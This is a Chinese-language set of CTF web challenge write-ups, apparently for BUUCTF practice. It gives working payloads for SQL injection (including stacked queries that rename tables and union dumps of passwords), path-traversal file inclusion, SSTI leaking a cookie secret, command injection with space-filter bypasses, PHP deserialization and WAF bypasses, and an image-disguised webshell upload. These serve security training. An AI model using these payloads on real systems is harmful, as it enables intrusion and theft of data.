[HCTF 2018]WarmUp

查看源码提示source.php，并在$whitelist = ["source"=>"source.php","hint"=>"hint.php"];代码提示下同时访问hint.php

题目源码

source.php

highlight_file(__FILE__);

class emmm

{

public static function checkFile(&$page)

{

$whitelist = ["source"=>"source.php","hint"=>"hint.php"];

---a

if (! isset($page) || !is_string($page)) {

echo "you can't see it";

return false;

}

---b

if (in_array($page, $whitelist)) {

return true;

}

---c

$_page = mb_substr(

$page,

0,

mb_strpos($page . '?', '?')

);

if (in_array($_page, $whitelist)) {

return true;

}

---d

$_page = urldecode($page);

$_page = mb_substr(

$_page,

0,

mb_strpos($_page . '?', '?')

);

---e

if (in_array($_page, $whitelist)) {

return true;

}

echo "you can't see it";

return false;

}

}

if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file'])) {

include $_REQUEST['file'];

exit;

} else {

echo "";

}

?>

hint.php

flag not here, and flag in ffffllllaaaagggg

解题思路

利用include()包含ffffllllaaaagggg文件

代码审计

传入字符串参数file，且emmm::checkFile($_REQUEST['file'])值为true

a-b区域：传入参数不为字符串类型就返回false；$page必须是字符串

b-c区域：$page的值为source.php或hint.php就返回true；$page必须不为source.php或hint.php

c-d区域：截取$page从开头到?的值，如果为source.php或hint.php就返回true

解题方法

由于flag位于/ffffllllaaaagggg中，所以结合目录穿越构造payload，之所以可以如此构造的原理稍后说明

?file=hint.php?../../../../../ffffllllaaaagggg

mb_substr() & mb_strpos()

mb_substr - 获取部分字符串

mb_substr ( string $str , int $start [, int $length = NULL [, string $encoding = mb_internal_encoding() ]] ) : string

根据字符数执行一个多字节安全的substr()操作。位置是从 str 的开始位置进行计数。第一个字符的位置是 0，第二个字符的位置是 1，以此类推

mb_strpos — 查找字符串在另一个字符串中首次出现的位置

mb_strpos ( string $haystack , string $needle [, int $offset = 0 [, string $encoding = mb_internal_encoding() ]] ) : int

查找string在一个string 中首次出现的位置。 基于字符数执行一个多字节安全的strpos操作。第一个字符的位置是 0，第二个字符的位置是 1，以此类推

路径 aaa/.../bbb

aaa/表示当前文件同级目录下的文件夹名(不检测该文件是否存在)

../bbb表示aaa/文件夹所在目录的父级目录下的文件名

father

├── aaa(文件夹 不一定要存在)

└── bbb(文件 一定要存在)

此题中hint.php?就是一个不存在的文件

[强网杯 2019]随便注

解题方法

先进行简单测试，发现过滤select

payload: ?inject=' union select 1,2,3%23

return : return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

测试中发现存在堆叠注入，查询当前数据库表结构，发现flag列名

payload: ?inject=';show tables;desc `1919810931114514`;desc words;

MySQL数据表命名细节

下列代码中A用全数字做表名，在使用时需要用反引号包裹，不然会产生错误，但如果半数字半字符或全字符则不需要

测试表的结构如下

MariaDB [test]> desc `1919810931114514`; --A

+-------+--------------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+-------+--------------+------+-----+---------+-------+

| flag | varchar(100) | NO | | NULL | |

+-------+--------------+------+-----+---------+-------+

1 row in set (0.01 sec)

MariaDB [test]> desc 1919810931114514;

ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1919810931114514' at line 1

MariaDB [test]> desc words; --B

+-------+-------------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+-------+-------------+------+-----+---------+-------+

| id | int(10) | NO | | NULL | |

| data | varchar(20) | NO | | NULL | |

+-------+-------------+------+-----+---------+-------+

2 rows in set (0.00 sec)

MariaDB [test]> desc 0d4y;

+-------+--------------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+-------+--------------+------+-----+---------+-------+

| name | varchar(100) | NO | | NULL | |

+-------+--------------+------+-----+---------+-------+

1 row in set (0.01 sec)

解题思路

把1919810931114514改名为words，之后将1919810931114514中的字段flag改名为id

利用mysql特性构造' or '1得到flag

解题过程

payload: ?inject=';rename table words to w; rename table `1919810931114514` to words; alter table words change flag id varchar(255);desc words;

return :

array(6) {

[0]=>

string(2) "id"

[1]=>

string(12) "varchar(255)"

[2]=>

string(3) "YES"

[3]=>

string(0) ""

[4]=>

NULL

[5]=>

string(0) ""

}

回显可以判断修改成功

payload: ?inject=1' or '1

解题思路

0x00 将查询flag的sql语句预定义

0x01 执行预定义sql语句

解题过程

payload: ?inject=';set @s = concat('s', 'elect * from `1919810931114514`');prepare a from @s; execute a;

return : strstr($inject, "set") && strstr($inject, "prepare")

以上回显表示set与prepare不能同时存在，由于MySQL默认情况下大小写不敏感，用Set绕过

payload: ?inject=';Set @s = concat('s', 'elect * from `1919810931114514`');prepare a from @s;execute a;

ALTER statement

用于修改数据表名或者修改数据表字段

删除，添加字段

MariaDB [test]> desc 0d4y;

+-------+--------------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+-------+--------------+------+-----+---------+-------+

| name | varchar(255) | YES | | NULL | |

+-------+--------------+------+-----+---------+-------+

1 row in set (0.00 sec)

MariaDB [test]> alter table 0d4y add age int;

Query OK, 0 rows affected (0.01 sec)

Records: 0 Duplicates: 0 Warnings: 0

MariaDB [test]> desc 0d4y;

+-------+--------------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+-------+--------------+------+-----+---------+-------+

| name | varchar(255) | YES | | NULL | |

| age | int(11) | YES | | NULL | |

+-------+--------------+------+-----+---------+-------+

2 rows in set (0.00 sec)

MariaDB [test]> alter table 0d4y drop age;

Query OK, 0 rows affected (0.01 sec)

Records: 0 Duplicates: 0 Warnings: 0

MariaDB [test]> desc 0d4y;

+-------+--------------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+-------+--------------+------+-----+---------+-------+

| name | varchar(255) | YES | | NULL | |

+-------+--------------+------+-----+---------+-------+

1 row in set (0.00 sec)

修改字段

MariaDB [test]> desc 0d4y;

+-------+--------------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+-------+--------------+------+-----+---------+-------+

| name | varchar(255) | YES | | NULL | |

+-------+--------------+------+-----+---------+-------+

1 row in set (0.00 sec)

MariaDB [test]> alter table 0d4y modify name varchar(100);

Query OK, 1 row affected (0.02 sec)

Records: 1 Duplicates: 0 Warnings: 0

MariaDB [test]> desc 0d4y;

+-------+--------------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+-------+--------------+------+-----+---------+-------+

| name | varchar(100) | YES | | NULL | |

+-------+--------------+------+-----+---------+-------+

1 row in set (0.00 sec)

MariaDB [test]> alter table 0d4y change `name` `id` int;

Query OK, 1 row affected, 1 warning (0.02 sec)

Records: 1 Duplicates: 0 Warnings: 1

MariaDB [test]> desc 0d4y;

+-------+---------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+-------+---------+------+-----+---------+-------+

| id | int(11) | YES | | NULL | |

+-------+---------+------+-----+---------+-------+

1 row in set (0.00 sec)

SET statement

MySQL用户变量定义格式

set @v = xxx;

PREPARE statement

PREPARE name from '[my sql sequece]'; //预定义SQL语句

EXECUTE name; //执行预定义SQL语句

(DEALLOCATE || DROP) PREPARE name; //删除预定义SQL语句

MariaDB [test]> prepare flag from "select * from 0d4y";

Query OK, 0 rows affected (0.00 sec)

Statement prepared

MariaDB [test]> execute flag;

+------+

| id |

+------+

| 0 |

+------+

1 row in set (0.00 sec)

MariaDB [test]> drop prepare flag;

Query OK, 0 rows affected (0.00 sec)

(未完成)[SUCTF 2019]EasySQL

[极客大挑战 2019]EasySQL

解题思路

猜测后台代码如下

$sql = SELECT * DROM database WHERE username = '$username' AND password = '$password';

解题方法

构造payload/check.php?username=admin' or 1=1 %23&password=1

[护网杯 2018]easy_tornado

题目提示

-- /flag.txt

flag in /fllllllllllllag

-- /welcome.txt

render

-- /hints.txt

md5(cookie_secret+md5(filename))

解题思路

0x00 render模板渲染暗示存在SSTI服务端模板注入攻击

0x01 handler.settings保存配置选项，包括cookie_secret

解题方法

访问文件时观察url

payload: /file?filename=/welcome.txt&filehash=1ee0dabf22eb0879a60444267ed3e063

存在文件读取点，访问/fllllllllllllag

页面跳转至/error?msg=Error

尝试SSTI

payload: /error?msg={{handler.settings}}

界面回显: {'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': '9c83fab7-1b67-404c-9aa8-69453579ac8c'}

exp.py

import hashlib

import requests

def md5(s):

md5 = hashlib.md5()

md5.update(s.encode())

return md5.hexdigest()

filename = "/fllllllllllllag"

cookie_secret = "9c83fab7-1b67-404c-9aa8-69453579ac8c"

filehash = md5(cookie_secret + md5(filename))

url = "http://93dc9c40-c8fc-4f2c-bce7-e28fae7437a6.node2.buuoj.cn.wetolink.com:82/file?filename=%s&filehash=%s" % (filename, filehash)

html = requests.get(url)

print(html.text)

[极客大挑战 2019]Havefun

解题思路

查看源码

代码审计

$cat=$_GET['cat'];

echo $cat;

if($cat=='dog'){

echo 'Syc{cat_cat_cat_cat}';

}

解题方法

/?cat=dog

(未完成)[RoarCTF 2019]Easy Calc

$('#calc').submit(function(){

$.ajax({

url:"calc.php?num="+encodeURIComponent($("#content").val()),

type:'GET',

success:function(data){

$("#result").html(`

`);

},

error:function(){

alert("这啥?算不来!");

}

})

return false;

})

访问calc.php得到后台源码

error_reporting(0);

if(!isset($_GET['num'])){

show_source(__FILE__);

}else{

$str = $_GET['num'];

$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];

foreach ($blacklist as $blackitem) {

if (preg_match('/' . $blackitem . '/m', $str)) {

die("what are you want to do?");

}

}

eval('echo '.$str.';');

}

?>

过滤的常用字符

`$^[]'"%20

过滤了单引号，在构造payload时用chr()代替

/calc.php? num=1;var_dump(scandir(chr(47))); // /f1agg

/calc.php? num=1;readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103));

$payload = "/f1agg";

$arr = str_split($payload);

foreach ($arr as $a)

echo "chr(".ord($a).").";

//chr(47).chr(102).chr(49).chr(97).chr(103).chr(103).

payload中有一个很关键的地方 num 前面有一个空格，因为题中存在 WAF，对 num 的值进行了校验，直接传 payload，会返回这啥?算不来，于是利用php字符串解析特性绕过 WAF，此时 WAF 检测到的变量名为%20num，不为 num，不进行校验，但php存储的变量名为 num

PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST的过程中会将某些字符删除或用下划线代替

如果一个 IDS/IPS 或 WAF 中有一条规则是当 news_id 参数的值是一个非数字的值则拦截，那么我们就可以用以下语句绕过

%20news[id%00 // 这个变量名的值实际存储在 $_GET["news_id"] 中

parse_str()通常被自动应用于 get 、post 请求和 cookie 中，对 URL 传递入的查询字符串进行解析

通过如下 fuzz 了解parse_str()如何处理特殊字符

foreach(["{chr}foo_bar", "foo{chr}bar", "foo_bar{chr}"] as $k => $arg) {

for($i=0;$i<=255;$i++) {

parse_str(str_replace("{chr}",chr($i),$arg),$o);

if(isset($o["foo_bar"])) {

echo $arg." -> ".bin2hex(chr($i))." (".chr($i).")\n";

} // bin2hex 将字符转为16进制数

}

echo "\n";

}

{chr}foo_bar -> 20 ( )

{chr}foo_bar -> 26 (&)

{chr}foo_bar -> 2b (+)

foo{chr}bar -> 20 ( )

foo{chr}bar -> 2b (+)

foo{chr}bar -> 2e (.)

foo{chr}bar -> 5b ([)

foo{chr}bar -> 5f (_)

foo_bar{chr} -> 00 ()

foo_bar{chr} -> 26 (&)

foo_bar{chr} -> 3d (=)

[极客大挑战 2019]Secret File

Ctrl+U查看源码，发现./Archive_room.php；访问之后发现./action.php

访问后页面跳转到./end.php，进行抓包

action.php

访问secr3t.php

代码审计

secret

highlight_file(__FILE__);

error_reporting(0);

$file=$_GET['file'];

if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){

echo "Oh no!";

exit();

}

include($file); //a

//flag放在了flag.php里

?>

a处发现文件包含漏洞

解题方法

直接设置payload为/secr3t.php?file=flag.php无法显示flag，因此使用php://filter进行文件读取

/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

对输出的base64密文进行解密即可

0x01 php://filter

php://filter 是php中独有的一个协议，可以作为一个中间流来处理其他流，可以进行任意文件的读取

[HCTF 2018]admin

[极客大挑战 2019]LoveSQL

解题思路

猜测后台代码如下

$sql = SELECT * DROM database WHERE username = '$username' AND password = '$password';

解题方法

构造payload/check.php?username=admin' or 1=1 %23&password=1

解密回显出password，md5查询无果，进行深度注入

查看列数

/check.php?username=admin' order by 3%23&password=1

确定注入点

/check.php?username=' union select 1,2,3%23&password=1

查看当前库表名

/check.php?username=' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema=database()),3%23&password=1

查看数据表l0ve1ysq1列名

/check.php?username=' union select 1, (select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'),3%23&password=1

查看密码

/check.php?username=' union select 1, (select group_concat(password) from l0ve1ysq1),3%23&password=1

0x01 hackbar细节

如果直接输入#作为截断符无效，需进行urlencode转换为%23才可

[GXYCTF2019]Ping Ping Ping

题目提示

/?ip=

解题思路

存在远程命令执行漏洞，利用;截断后可进行文件读取

解题方法

查看当今文件夹

?ip=1;ls

PING 1 (0.0.0.1): 56 data bytes

flag.php

index.php

先查看index.php，了解后台逻辑后便于构造payload

?ip=1;cat index.php

/?ip= fxck your space!

waf空格，利用$IFS$9绕过

?ip=1;cat$IFS$9index.php

代码审计

|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){

echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);

die("fxck your symbol!");

} else if(preg_match("/ /", $ip)){

die("fxck your space!");

} else if(preg_match("/bash/", $ip)){

die("fxck your bash!");

} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){

die("fxck your flag!");

}

$a = shell_exec("ping -c 4 ".$ip);

echo "

";

print_r($a);

}

过滤了除$外大多数符号，空格，bash，还有一句比较有意思的正则表达式

preg_match("/.*f.*l.*a.*g.*/", $ip)

.*表示匹配任意字符任意次；代码的逻辑意思就是flag四个字母不能同顺序出现

构造payload，并查看源码

/?ip=1;a=g;cat$IFS$9fla$a.php

0x01 shell变量命名规范

变量名必须是以字母或下划线字符“_”开头，后面跟字母、数字或下划线字符。不要使用特殊字符命名变量，变量名和等号之间不能有空格

0x02 $IFS$9

$IFS内部域分隔符

shell的环境变量分为set和env，IFS是一种 set 变量，默认值是space, tab, newline

查看$IFS值

> echo "$IFS" | od -b

0000000 040 011 012 012

0000004

"040"是空格，"011"是Tab，"012"是换行，最后一个"012"是因为echo默认换行

$9

$1～$n表示添加到shell的各参数值；$0为当前文件名，$1是第1参数、$2是第2参数以此类推；$9此时为空值，在这里的作用为截断变量名，等同于{}(由于题目waf了大括号)，即限定变量名的范围；如果没有进行截断的话，IFS会接着和后面的字符连接为变量名，无法构成完整的内部域分隔符，当然也不一定非要为9，还可以是1~8的其他数字

[极客大挑战 2019]PHP

题目提示

因为每次猫猫都在我键盘上乱跳，所以我有一个良好的备份网站的习惯

文件扫描

python3 dirsearch.py -u url -e php

-u url

-e 网站语言

下载/www.zip

代码审计

----index.php

include 'class.php';

$select = $_GET['select'];

$res=unserialize(@$select);

?>

----class.php

include 'flag.php';

error_reporting(0);

class Name{

private $username = 'nonono';

private $password = 'yesyesyes';

public function __construct($username,$password){

$this->username = $username;

$this->password = $password;

}

function __wakeup(){

$this->username = 'guest';

}

function __destruct(){

if ($this->password != 100) {

echo "NO!!!hacker!!!";

echo "You name is: ";

echo $this->username;echo "";

echo "You password is: ";

echo $this->password;echo "";

die();

}

if ($this->username === 'admin') {

global $flag;

echo $flag;

}else{

echo "hello my friend~~sorry i can't give you the flag!";

die();

}

}

}

?>

解题思路

0x00 password = 100

0x01 username = admin

0x02 绕过__wakeup函数的初始化

0x03 url编码

解题方法

echo urlencode(serialize(new Name('admin', '100')));

O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

-> 将2换3

O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

0x01 __wakeup() & __destruct() & __sleep()

__sleep()

在程序执行前，serialize() 函数会首先检查是否存在 __sleep().如果存在，__sleep()方法会先被调用，然后才执行序列化

__wakeup()

触发于unserilize()调用之前, 但当反序列化时的字符串所对应的对象的数目被修改，__wake()函数就不会被调用，从而实现绕过

__destruct()

在到对象的所有引用都被删除或者当对象被显式销毁时执行

0x02 对序列化结果进行url编码

因为private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上%00前缀字符串长度也包括所加前缀的长度

但如果不进行url编码直接使用payload，可以很明显发现%00字符消失，自然会导致失败

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

[ACTF2020 新生赛]Include

解题思路

/?file=flag.php猜测存在文件包含漏洞

解题方法

?file=php://filter/convert.base64-encode/resource=flag.php

[极客大挑战 2019]Knife

题目提示

eval($_POST["Syc"]);

解题方法

蚁剑连接

[极客大挑战 2019]Http

解题方法

查看源码，访问Secret.php，会连续出现三个要求，设置http头即可

[SUCTF 2019]CheckIn

[ACTF2020 新生赛]Exec

解题方法

target=;cd ..;cd ..;cd ..;cat flag

[极客大挑战 2019]BabySQL

解题思路

猜测后台代码如下

$sql = SELECT * DROM database WHERE username = '$username' AND password = '$password';

解题方法

构造payload/check.php?username=admin' or 1=1 %23&password=1，观察回显猜测过滤or，尝试双写绕过

/check.php?username=admin' oorr 1=1 %23&password=1

回显成功，进行深度注入，再根据回显进行双写

查看数据表名

?username=admin&password=' ununionion selselectect 1,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()),3%23

查看b4bsql密码

?username=admin&password=' ununionion selselectect 1,(selselectect group_concat(passwoorrd) frfromom b4bsql),3%23

[CISCN2019 华北赛区 Day2 Web1]Hack World

[极客大挑战 2019]Upload

解题思路

上传含webshell的可执行文件

解题方法

创建图片马

trojan.gif

GIF89a

上传图片并更改文件后缀，由于php等一系列后缀被过滤，故使用phtml

POST /upload_file.php HTTP/1.1

Host: 338d1805-c3c7-4b7c-8dde-950a068bc645.node3.buuoj.cn

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------12241674773713346554132597235

Content-Length: 399

Origin: http://338d1805-c3c7-4b7c-8dde-950a068bc645.node3.buuoj.cn

Connection: close

Referer: http://338d1805-c3c7-4b7c-8dde-950a068bc645.node3.buuoj.cn/

Upgrade-Insecure-Requests: 1

-----------------------------12241674773713346554132597235

Content-Disposition: form-data; name="file"; filename="trojan.phtml"

Content-Type: image/gif

GIF89a

-----------------------------12241674773713346554132597235

Content-Disposition: form-data; name="submit"

提交

-----------------------------12241674773713346554132597235--

文件上传至/upload文件夹，蚁剑连接

0x01图片文件头欺骗

GIF89a图形文件是一个根据图形交换格式(GIF)89a版(1989年7月发行)进行格式化之后的图形，再文件头部加上GIF89a，后台检测会判定为图片